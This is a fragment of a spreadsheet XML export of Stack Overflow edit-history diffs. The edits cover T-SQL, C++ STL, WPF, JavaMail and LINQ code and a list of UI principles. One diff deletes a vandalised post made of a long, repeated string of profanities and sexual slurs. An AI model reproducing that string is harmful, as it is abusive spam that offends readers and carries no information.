    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;DECLARE&lt;/span&gt; @start &lt;span class="diff-delete"&gt;DATETIME&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;DECLARE&lt;/span&gt; @fin &lt;span class="diff-delete"&gt;DATETIME&lt;/span&gt; _x000D_
_x000D_
&lt;span class="diff-delete"&gt;SELECT&lt;/span&gt;  @start = &lt;span class="diff-delete"&gt;DATEADD&lt;/span&gt;(second, 60, '2008-01-01')&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; @fin = &lt;span class="diff-delete"&gt;DATEADD&lt;/span&gt;(second, 60, '2008-01-04')_x000D_
_x000D_
&lt;span class="diff-delete"&gt;SELECT &lt;/span&gt; ServerId&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; State&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; Total = &lt;span class="diff-delete"&gt;SUM&lt;/span&gt;(&lt;span class="diff-delete"&gt;CASE WHEN StartTime &amp;gt; @start&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;                     &lt;/span&gt;         &lt;span class="diff-delete"&gt;AND&lt;/span&gt; &lt;span class="diff-delete"&gt;DATEADD&lt;/span&gt;(second, Seconds, StartTime) &amp;lt;= @fin_x000D_
&lt;span class="diff-delete"&gt;                 &lt;/span&gt;        &lt;span class="diff-delete"&gt;THEN&lt;/span&gt; Seconds_x000D_
&lt;span class="diff-delete"&gt;                     &lt;/span&gt;    &lt;span class="diff-delete"&gt;WHEN&lt;/span&gt; StartTime &amp;lt; @start&lt;span class="diff-delete"&gt;_x000D_
                             &lt;/span&gt; &lt;span class="diff-delete"&gt;AND&lt;/span&gt; &lt;span class="diff-delete"&gt;DATEADD&lt;/span&gt;(second, Seconds, StartTime) &amp;lt;= @fin_x000D_
&lt;span class="diff-delete"&gt;                 &lt;/span&gt;        &lt;span class="diff-delete"&gt;THEN&lt;/span&gt; &lt;span class="diff-delete"&gt;DATEDIFF&lt;/span&gt;(second, @start,&lt;span class="diff-delete"&gt;_x000D_
                                      &lt;/span&gt; &lt;span class="diff-delete"&gt;DATEADD&lt;/span&gt;(second, Seconds, StartTime))&lt;span class="diff-delete"&gt;_x000D_
                    &lt;/span&gt;     &lt;span class="diff-delete"&gt;WHEN&lt;/span&gt; StartTime &amp;lt; @start&lt;span class="diff-delete"&gt;_x000D_
                             &lt;/span&gt; &lt;span class="diff-delete"&gt;AND&lt;/span&gt; &lt;span class="diff-delete"&gt;DATEADD&lt;/span&gt;(second, Seconds, StartTime) &amp;gt;= @fin_x000D_
&lt;span class="diff-delete"&gt;                 &lt;/span&gt;        &lt;span class="diff-delete"&gt;THEN&lt;/span&gt; &lt;span class="diff-delete"&gt;DATEDIFF&lt;/span&gt;(second, @start, @fin)_x000D_
&lt;span class="diff-delete"&gt;             &lt;/span&gt;            &lt;span class="diff-delete"&gt;ELSE&lt;/span&gt; &lt;span class="diff-delete"&gt;DATEDIFF&lt;/span&gt;(second,&lt;span class="diff-delete"&gt; &lt;/span&gt;StartTime,&lt;span class="diff-delete"&gt; &lt;/span&gt;@fin)_x000D_
&lt;span class="diff-delete"&gt;                &lt;/span&gt;    &lt;span class="diff-delete"&gt;END&lt;/span&gt;)_x000D_
&lt;span class="diff-delete"&gt;INTO   &lt;/span&gt; #t_x000D_
&lt;span class="diff-delete"&gt;FROM   &lt;/span&gt; ServerStatus&lt;span class="diff-delete"&gt;_x000D_
WHERE &lt;/span&gt;  @start &amp;lt; &lt;span class="diff-delete"&gt;DATEADD&lt;/span&gt;(second, Seconds, StartTime)&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; &lt;span class="diff-delete"&gt;AND&lt;/span&gt; @fin &amp;gt; StartTime_x000D_
&lt;span class="diff-delete"&gt;GROUP&lt;/span&gt; &lt;span class="diff-delete"&gt;BY&lt;/span&gt; ServerId&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; State_x000D_
_x000D_
&lt;span class="diff-delete"&gt;INSERT &lt;/span&gt; #t_x000D_
&lt;span class="diff-delete"&gt;        SELECT &lt;/span&gt; ServerId&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
               &lt;/span&gt; 'unknown'&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
               &lt;/span&gt; &lt;span class="diff-delete"&gt;DATEDIFF&lt;/span&gt;(second, @start, @fin) - &lt;span class="diff-delete"&gt;SUM&lt;/span&gt;(Total)&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; &lt;span class="diff-delete"&gt;FROM    #t&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;      &lt;/span&gt;  &lt;span class="diff-delete"&gt;GROUP&lt;/span&gt; &lt;span class="diff-delete"&gt;BY&lt;/span&gt; ServerId_x000D_
&lt;span class="diff-delete"&gt;        HAVING &lt;/span&gt; &lt;span class="diff-delete"&gt;DATEDIFF&lt;/span&gt;(second, @start, @fin) &amp;gt; &lt;span class="diff-delete"&gt;SUM&lt;/span&gt;(Total)_x000D_
_x000D_
&lt;span class="diff-delete"&gt;SELECT &lt;/span&gt; *&lt;span class="diff-delete"&gt;_x000D_
FROM  &lt;/span&gt;  #t_x000D_
&lt;span class="diff-delete"&gt;ORDER&lt;/span&gt; &lt;span class="diff-delete"&gt;BY&lt;/span&gt; ServerId&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; State_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;declare&lt;/span&gt; @start &lt;span class="diff-add"&gt;datetime&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;declare&lt;/span&gt; @fin &lt;span class="diff-add"&gt;datetime&lt;/span&gt; _x000D_
_x000D_
&lt;span class="diff-add"&gt;select&lt;/span&gt;  @start = &lt;span class="diff-add"&gt;dateadd&lt;/span&gt;(second, 60, '2008-01-01'), @fin = &lt;span class="diff-add"&gt;dateadd&lt;/span&gt;(second, 60, '2008-01-04')_x000D_
_x000D_
&lt;span class="diff-add"&gt;select&lt;/span&gt; ServerId, State, Total = &lt;span class="diff-add"&gt;sum&lt;/span&gt;(_x000D_
    &lt;span class="diff-add"&gt;case&lt;/span&gt; &lt;span class="diff-add"&gt;when&lt;/span&gt; &lt;span class="diff-add"&gt;StartTime&lt;/span&gt; &lt;span class="diff-add"&gt;&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;@start&lt;/span&gt; &lt;span class="diff-add"&gt;and&lt;/span&gt; &lt;span class="diff-add"&gt;DateAdd&lt;/span&gt;(second, Seconds, StartTime) &amp;lt;= @fin_x000D_
        &lt;span class="diff-add"&gt;then&lt;/span&gt; Seconds_x000D_
    &lt;span class="diff-add"&gt;when&lt;/span&gt; StartTime &amp;lt; @start &lt;span class="diff-add"&gt;and&lt;/span&gt; &lt;span class="diff-add"&gt;DateAdd&lt;/span&gt;(second, Seconds, StartTime) &amp;lt;= @fin_x000D_
        &lt;span class="diff-add"&gt;then&lt;/span&gt; &lt;span class="diff-add"&gt;DateDiff&lt;/span&gt;(second, @start, &lt;span class="diff-add"&gt;DateAdd&lt;/span&gt;(second, Seconds, StartTime)) &lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;    &lt;span class="diff-add"&gt;when&lt;/span&gt; StartTime &amp;lt; @start &lt;span class="diff-add"&gt;and&lt;/span&gt; &lt;span class="diff-add"&gt;DateAdd&lt;/span&gt;(second, Seconds, StartTime) &amp;gt;= @fin_x000D_
        &lt;span class="diff-add"&gt;then&lt;/span&gt; &lt;span class="diff-add"&gt;DateDiff&lt;/span&gt;(second, @start, @fin)_x000D_
    &lt;span class="diff-add"&gt;else&lt;/span&gt; &lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;        &lt;span class="diff-add"&gt;DateDiff&lt;/span&gt;(second,StartTime,@fin)_x000D_
    &lt;span class="diff-add"&gt;end&lt;/span&gt;)_x000D_
&lt;span class="diff-add"&gt;into&lt;/span&gt; #t_x000D_
&lt;span class="diff-add"&gt;from&lt;/span&gt; ServerStatus &lt;span class="diff-add"&gt;_x000D_
where&lt;/span&gt; @start &amp;lt; &lt;span class="diff-add"&gt;dateadd&lt;/span&gt;(second, Seconds, StartTime) &lt;span class="diff-add"&gt;_x000D_
and&lt;/span&gt; @fin &amp;gt; StartTime_x000D_
&lt;span class="diff-add"&gt;group&lt;/span&gt; &lt;span class="diff-add"&gt;by&lt;/span&gt; ServerId, State_x000D_
_x000D_
&lt;span class="diff-add"&gt;insert&lt;/span&gt; #t_x000D_
&lt;span class="diff-add"&gt;select&lt;/span&gt; ServerId, 'unknown', &lt;span class="diff-add"&gt;DateDiff&lt;/span&gt;(second, @start, @fin) - &lt;span class="diff-add"&gt;sum&lt;/span&gt;(Total) _x000D_
&lt;span class="diff-add"&gt;from&lt;/span&gt; &lt;span class="diff-add"&gt;#t&lt;/span&gt; &lt;span class="diff-add"&gt;_x000D_
group&lt;/span&gt; &lt;span class="diff-add"&gt;by&lt;/span&gt; ServerId_x000D_
&lt;span class="diff-add"&gt;having&lt;/span&gt; &lt;span class="diff-add"&gt;DateDiff&lt;/span&gt;(second, @start, @fin) &amp;gt; &lt;span class="diff-add"&gt;sum&lt;/span&gt;(Total)_x000D_
_x000D_
&lt;span class="diff-add"&gt;select&lt;/span&gt; * &lt;span class="diff-add"&gt;from&lt;/span&gt; #t&lt;span class="diff-add"&gt; &lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;order&lt;/span&gt; &lt;span class="diff-add"&gt;by&lt;/span&gt; ServerId, State_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Aaron Bertrand</t>
  </si>
  <si>
    <t>Ardalan Shahgholi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Container Types:_x000D_
================_x000D_
Container:_x000D_
    Forward Container_x000D_
        Reverse Container_x000D_
            Random Access Container_x000D_
    Sequence_x000D_
        Front Insert Sequence_x000D_
        Back  Insert Sequence_x000D_
    Associative Container_x000D_
        Simple   Associative Container_x000D_
        Pair     Associative Container_x000D_
        Sorted   Associative Container_x000D_
        Multiple Associative Container_x000D_
_x000D_
Container Types mapped to Standard Containers_x000D_
=============================================_x000D_
_x000D_
std::vector:    Sequence    Back        Sequence                    Forward/Reverse/Random &lt;span class="diff-delete"&gt;Iterator&lt;/span&gt;_x000D_
std::deque:     Sequence    Front/Back  Sequence                    Forward/Reverse/Random &lt;span class="diff-delete"&gt;Iterator&lt;/span&gt;_x000D_
std::list:      Sequence    Front/Back  &lt;span class="diff-delete"&gt;Sequence&lt;/span&gt;                    Forward/Reverse &lt;span class="diff-delete"&gt;Iterator&lt;/span&gt;_x000D_
std::set:       Sorted/Simple/Unique    Associative Container       Forward &lt;span class="diff-delete"&gt;Iterator&lt;/span&gt;_x000D_
std::map:       Sorted/Pair/Unique      Associative Container       Forward &lt;span class="diff-delete"&gt;Iterator&lt;/span&gt;_x000D_
std::multiset:  Sorted/Simple/Multiple  Associative Container       Forward &lt;span class="diff-delete"&gt;Iterator&lt;/span&gt;_x000D_
std::multimap:  Sorted/Pair/Multiple    Associative Container       Forward &lt;span class="diff-delete"&gt;Iterator&lt;/span&gt;_x000D_
_x000D_
_x000D_
Container Guarantees:_x000D_
=====================_x000D_
_x000D_
                                                                                  Simp_x000D_
                                                                                  or_x000D_
                          For   Rev  Rand        Front  Back  Assoc        Sort   Mult_x000D_
                    Cont: Cont: Cont Cont: Sequ: Sequ:  Sequ: Cont:        Cont:  Cont:_x000D_
Copy    Const:      O(n)_x000D_
Fill    Const:                             O(n)_x000D_
begin()             O(1)_x000D_
end()               O(1)_x000D_
rbegin()                        O(1)_x000D_
rend()                          O(1)_x000D_
front()                                    O(1)_x000D_
push_front()                                     O(1)_x000D_
pop_front()                                      O(1)_x000D_
push_back()                                             O(1)_x000D_
pop_back()                                              O(1)_x000D_
Insert()                                                                          O(ln(n))_x000D_
Insert: fill                               O(n)_x000D_
Insert: range                              O(n)                                   O(kln(n)+n)_x000D_
size()              O(n)_x000D_
swap()              O(1)_x000D_
erase key                                                     O(ln(n))_x000D_
erase element                                                 O(1)_x000D_
erase range                                                   O(ln(n)+S)_x000D_
count()                                                       O(log(n)+k)_x000D_
find()                                                        O(ln(n))_x000D_
equal range                                                   O(ln(n))_x000D_
Lower Bound/Upper Bound                                                    O(ln(n))_x000D_
Equality                  O(n)_x000D_
InEquality                O(n)_x000D_
Element Access                       O(1)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Container Types:_x000D_
================_x000D_
Container:_x000D_
    Forward Container_x000D_
        Reverse Container_x000D_
            Random Access Container_x000D_
    Sequence_x000D_
        Front Insert Sequence_x000D_
        Back  Insert Sequence_x000D_
    Associative Container_x000D_
        Simple   Associative Container_x000D_
        Pair     Associative Container_x000D_
        Sorted   Associative Container_x000D_
        Multiple Associative Container_x000D_
_x000D_
Container Types mapped to Standard Containers_x000D_
=============================================_x000D_
_x000D_
std::vector:    Sequence    Back        Sequence                    Forward/Reverse/Random &lt;span class="diff-add"&gt;Container&lt;/span&gt;_x000D_
std::deque:     Sequence    Front/Back  Sequence                    Forward/Reverse/Random &lt;span class="diff-add"&gt;Container&lt;/span&gt;_x000D_
std::list:      Sequence    Front/Back  &lt;span class="diff-add"&gt;Seuqence&lt;/span&gt;                    Forward/Reverse &lt;span class="diff-add"&gt;Container&lt;/span&gt;_x000D_
std::set:       Sorted/Simple/Unique    Associative Container       Forward &lt;span class="diff-add"&gt;Container&lt;/span&gt;_x000D_
std::map:       Sorted/Pair/Unique      Associative Container       Forward &lt;span class="diff-add"&gt;Container&lt;/span&gt;_x000D_
std::multiset:  Sorted/Simple/Multiple  Associative Container       Forward &lt;span class="diff-add"&gt;Container&lt;/span&gt;_x000D_
std::multimap:  Sorted/Pair/Multiple    Associative Container       Forward &lt;span class="diff-add"&gt;Container&lt;/span&gt;_x000D_
_x000D_
_x000D_
Container Guarantees:_x000D_
=====================_x000D_
_x000D_
                                                                                  Simp_x000D_
                                                                                  or_x000D_
                          For   Rev  Rand        Front  Back  Assoc        Sort   Mult_x000D_
                    Cont: Cont: Cont Cont: Sequ: Sequ:  Sequ: Cont:        Cont:  Cont:_x000D_
Copy    Const:      O(n)_x000D_
Fill    Const:                             O(n)_x000D_
begin()             O(1)_x000D_
end()               O(1)_x000D_
rbegin()                        O(1)_x000D_
rend()                          O(1)_x000D_
front()                                    O(1)_x000D_
push_front()                                     O(1)_x000D_
pop_front()                                      O(1)_x000D_
push_back()                                             O(1)_x000D_
pop_back()                                              O(1)_x000D_
Insert()                                                                          O(ln(n))_x000D_
Insert: fill                               O(n)_x000D_
Insert: range                              O(n)                                   O(kln(n)+n)_x000D_
size()              O(n)_x000D_
swap()              O(1)_x000D_
erase key                                                     O(ln(n))_x000D_
erase element                                                 O(1)_x000D_
erase range                                                   O(ln(n)+S)_x000D_
count()                                                       O(log(n)+k)_x000D_
find()                                                        O(ln(n))_x000D_
equal range                                                   O(ln(n))_x000D_
Lower Bound/Upper Bound                                                    O(ln(n))_x000D_
Equality                  O(n)_x000D_
InEquality                O(n)_x000D_
Element Access                       O(1)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Viet</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore Shit Piss Fuck Cunt Cocksucker Motherfucker Tits Slut Whore&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I'm a long-time C#/.NET programmer but totally new to WPF and the System.Windows.Controls namespace and XAML. The more I learn about it the more I realize that you can do pretty much all of your GUI initialization and event handling glue in either XAML or in code (say C# code or VB.Net code).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; My question is to those who have been working on WPF for longer and ideally those who have shipped apps with it -- where did you find was the best place to 'draw the line' between XAML and code? Did you use XAML wherever you could? Only where interfacing with non-coding UI designers?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Any tips in this area would be extremely helpful to myself and other coders who are just getting into WPF programming and are kind of paralyzed by all the choices we can make!&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>John Franks</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Assuming that you don't want to read some links and don't want any external dependencies, you need to use MimeMultipart and BodyPart:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;MimeMultipart messageContent = new MimeMultipart();_x000D_
_x000D_
&lt;span class="diff-delete"&gt;MimeBodyPart&lt;/span&gt; bodyPart = new MimeBodyPart();_x000D_
DataSource source = new FileDataSource(yourFile);_x000D_
bodyPart.setDataHandler(new DataHandler(source);_x000D_
bodyPart.setFileName("MyFile.ext");_x000D_
bodyPart.setDisposition(Part.ATTACHMENT);_x000D_
_x000D_
// Then add to your message:_x000D_
messageContent.addBodyPart(bodyPart);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Attaching a body to the messages is just attaching a BodyPart with disposition Part.INLINE&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Assuming that you don't want to read some links and don't want any external dependencies, you need to use MimeMultipart and BodyPart:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;MimeMultipart messageContent = new MimeMultipart();_x000D_
_x000D_
&lt;span class="diff-add"&gt;BodyPart&lt;/span&gt; bodyPart = new MimeBodyPart();_x000D_
DataSource source = new FileDataSource(yourFile);_x000D_
bodyPart.setDataHandler(new DataHandler(source);_x000D_
bodyPart.setFileName("MyFile.ext");_x000D_
bodyPart.setDisposition(Part.ATTACHMENT);_x000D_
_x000D_
// Then add to your message:_x000D_
messageContent.addBodyPart(bodyPart);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Attaching a body to the messages is just attaching a BodyPart with disposition Part.INLINE&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Frankie</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I don't know if this will help you but..&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;NorthwindDataContext dc = new NorthwindDataContext();    _x000D_
dc.Log = Console.Out;_x000D_
&lt;span class="diff-delete"&gt;List&amp;lt;int&amp;gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;customerList&lt;/span&gt; =&lt;span class="diff-delete"&gt; (from o&lt;/span&gt; &lt;span class="diff-delete"&gt;in&lt;/span&gt; &lt;span class="diff-delete"&gt;dc.Orders  &lt;/span&gt;  _x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;           &lt;span class="diff-delete"&gt;select&lt;/span&gt; &lt;span class="diff-delete"&gt;o.CustomerID).ToList();&lt;/span&gt; &lt;span class="diff-delete"&gt;//&lt;/span&gt; &lt;span class="diff-delete"&gt;this&lt;/span&gt; &lt;span class="diff-delete"&gt;important&lt;/span&gt; &lt;span class="diff-delete"&gt;for&lt;/span&gt; &lt;span class="diff-delete"&gt;performance_x000D_
_x000D_
var&lt;/span&gt; &lt;span class="diff-delete"&gt;query&lt;/span&gt; &lt;span class="diff-delete"&gt;=&lt;/span&gt;    _x000D_
    &lt;span class="diff-delete"&gt;from c in dc.Customers&lt;/span&gt;    &lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;    &lt;span class="diff-delete"&gt;where&lt;/span&gt; &lt;span class="diff-delete"&gt;!(customerList&lt;/span&gt;)    _x000D_
           .Contains(c.CustomerID)    _x000D_
    select c;_x000D_
_x000D_
foreach (var c in query) Console.WriteLine( c );_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; from &lt;a href="http://programminglinq.com/blogs/marcorusso/archive/2008/01/14/the-not-in-clause-in-linq-to-sql.aspx" rel="nofollow noreferrer"&gt;http://programminglinq.com/blogs/marcorusso/archive/2008/01/14/the-not-in-clause-in-linq-to-sql.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I don't know if this will help you but..&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;NorthwindDataContext dc = new NorthwindDataContext();    _x000D_
dc.Log = Console.Out;_x000D_
&lt;span class="diff-add"&gt;_x000D_
var&lt;/span&gt; &lt;span class="diff-add"&gt;query&lt;/span&gt; =    _x000D_
    &lt;span class="diff-add"&gt;from&lt;/span&gt; &lt;span class="diff-add"&gt;c&lt;/span&gt; &lt;span class="diff-add"&gt;in&lt;/span&gt; &lt;span class="diff-add"&gt;dc.Customers&lt;/span&gt;    &lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;    &lt;span class="diff-add"&gt;where&lt;/span&gt; &lt;span class="diff-add"&gt;!(from&lt;/span&gt; &lt;span class="diff-add"&gt;o&lt;/span&gt; &lt;span class="diff-add"&gt;in&lt;/span&gt; &lt;span class="diff-add"&gt;dc.Orders&lt;/span&gt;    _x000D_
            &lt;span class="diff-add"&gt;select&lt;/span&gt; &lt;span class="diff-add"&gt;o.CustomerID&lt;/span&gt;)    _x000D_
           .Contains(c.CustomerID)    _x000D_
    select c;_x000D_
_x000D_
foreach (var c in query) Console.WriteLine( c );_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; from &lt;a href="http://programminglinq.com/blogs/marcorusso/archive/2008/01/14/the-not-in-clause-in-linq-to-sql.aspx" rel="nofollow noreferrer"&gt;http://programminglinq.com/blogs/marcorusso/archive/2008/01/14/the-not-in-clause-in-linq-to-sql.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Robert Paulson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Cleared for Deletion&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; ##First Principles: &lt;/span&gt;&lt;a href="http://www.informatik.uni-trier.de/%7Eley/db/indices/a-tree/h/Hansen:Wilfred_J=.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Wilfred James Hansen&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;ul&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
   &lt;li&gt;&lt;span class="diff-add"&gt; Know the User&lt;/span&gt;&lt;/li&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
   &lt;li&gt;&lt;span class="diff-add"&gt; Minimize Memorization&lt;/span&gt;&lt;/li&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
   &lt;li&gt;&lt;span class="diff-add"&gt; Optimize Operations&lt;/span&gt;&lt;/li&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
   &lt;li&gt;&lt;span class="diff-add"&gt; Engineer for Errors&lt;/span&gt;&lt;/li&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;/ul&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;br&gt; _x000D_
